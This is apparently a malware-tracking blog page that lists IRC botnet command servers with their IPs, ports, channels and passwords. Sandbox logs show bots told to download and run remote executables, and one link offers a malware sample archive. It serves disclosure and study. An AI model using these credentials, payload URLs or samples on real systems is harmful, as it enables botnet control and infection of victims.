the noob is xGoogle from hackforums he have like 6 leafs and he think he’s a hecker lol every botnet in the blog wich uses the port 1888 is from him Remote Host Port Number 146.0.73.82 1888 PASS strike 199.101.133.57 80 199.15.234.7 80 70.38.98.239 80 PRIVMSG #XP :[d=”http://img105.herosh.com/2011/10/23/296108402.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplicationRead more...
31.214.201.171(ngrBot hosted in Germany Marcel Edler Trading As Optimate-server)
Remote Host Port Number 199.15.234.7 80 31.214.201.171 1888 PASS strike NICK n{US|XPa}dciaump USER dciaump 0 0 :dciaump JOIN #asdf strike Now talking in #asdf Topic On: [ #asdf ] [ ~pu http://dc429.4shared.com/download/IwwpPGS9/sdafsdfad54534.exe b8b96e49511c4b1c70211be8a3968240 ~s -o ~s ] Topic By: [ google ] JOIN #XP JOIN #US hosting infos: http://whois.domaintools.com/31.214.201.171
146.0.73.83(ngrBot hosted in Netherlands Amsterdam Hostkey B.v)
Remote Host Port Number 146.0.73.83 1888 PASS strike 199.15.234.7 80 70.38.98.238 80 NICK n{US|XPa}wdpvgfm USER wdpvgfm 0 0 :wdpvgfm JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img104.herosh.com/2011/10/21/2578445.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 The data identified by the following URLs was then requested from the remote webRead more...
46.17.96.36(ngrBot hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number 199.101.133.68 80 199.15.234.7 80 70.38.98.238 80 46.17.96.36 1888 PASS strike PRIVMSG #xp :[d=”http://img104.herosh.com/2011/10/21/2578445.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.exe” – Download retries: 0 NICK n{US|XPa}eddkvsd USER eddkvsd 0 0 :eddkvsd JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #xp :[d=”http://dc440.4shared.com/download/bSZjbmUZ/sfgdfsd966.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe”Read more...
64.31.42.67(ngrBot hosted in United States Limestone Networks Inc)
Remote Host Port Number 199.15.234.7 80 64.31.42.67 1863 PASS secret NICK n{US|XPa}ekxhwua USER ekxhwua 0 0 :ekxhwua JOIN #bots priv8s hosting infos: http://whois.domaintools.com/64.31.42.67
forum.07a.su(irc botnet hosted in Russian Federation Moscow Oao Webalta)
Remote Host Port Number 83.137.194.30 80 92.241.168.221:6789 ircd here 92.241.169.165:6789 ircd here Resolved : [forum.07a.su] To [92.241.168.221] Resolved : [forum.07a.su] To [92.241.169.165] NICK [N00_USA_XP_0727651]x MODE ##im -ix USER SP2-465 * 0 :COMPUTERNAME MODE [N00_USA_XP_0727651]x A -ix JOIN ##im PRIVMSG #xxs :HTTP SET hxxp://whiteforum1.com/fud.exe NICK [N00_USA_XP_3168281]x PRIVMSG #xxs :HTTP SET hxxp://bisp.gov.pk/203.exe PRIVMSG [N00_USA_XP_3168 @ :download; FileRead more...
75mb malware samples
75MB malware files for analysis(gbot,ngrBot,banking trojans) have fun Download: http://2926db4c.ultrafiles.net
irc.sxe-injected.com(300 linux bots hosted in Argentina Buenos Aires Localhost S.a)
server:irc.sxe-injected.com port:6667 chan:#magno321 password:lol123 hosting infos: http://whois.domaintools.com/200.43.192.219
74.208.164.167(irc botnet hosted in United States Miami 1&1 Internet Inc)
Remote Host Port Number 204.0.5.50 80 204.0.5.58 80 216.178.38.224 80 63.135.80.46 80 72.21.91.19 80 74.125.47.100 80 74.208.164.167 1234 PASS xxx NICK NEW-[USA|00|P|21899] USER XP-0708 * 0 :COMPUTERNAME NICK [USA|00|P|65504] USER XP-6261 * 0 :COMPUTERNAME NICK [USA|00|P|68249] USER XP-7577 * 0 :COMPUTERNAME NICK [USA|00|P|47739] USER XP-7950 * 0 :COMPUTERNAME I have 748 clients and 1 serversRead more...
88.86.119.55(irc botnet hosted in Czech Republic Supernetwork S.r.o)
Remote Host Port Number 88.86.119.55 4244 PASS BIG NICK new[iRooT-XP-USA]036409 USER 0364 “” “TsGh” :0364 JOIN #N# BIG PONG :irc.akanska.com hosting infos: http://whois.domaintools.com/88.86.119.55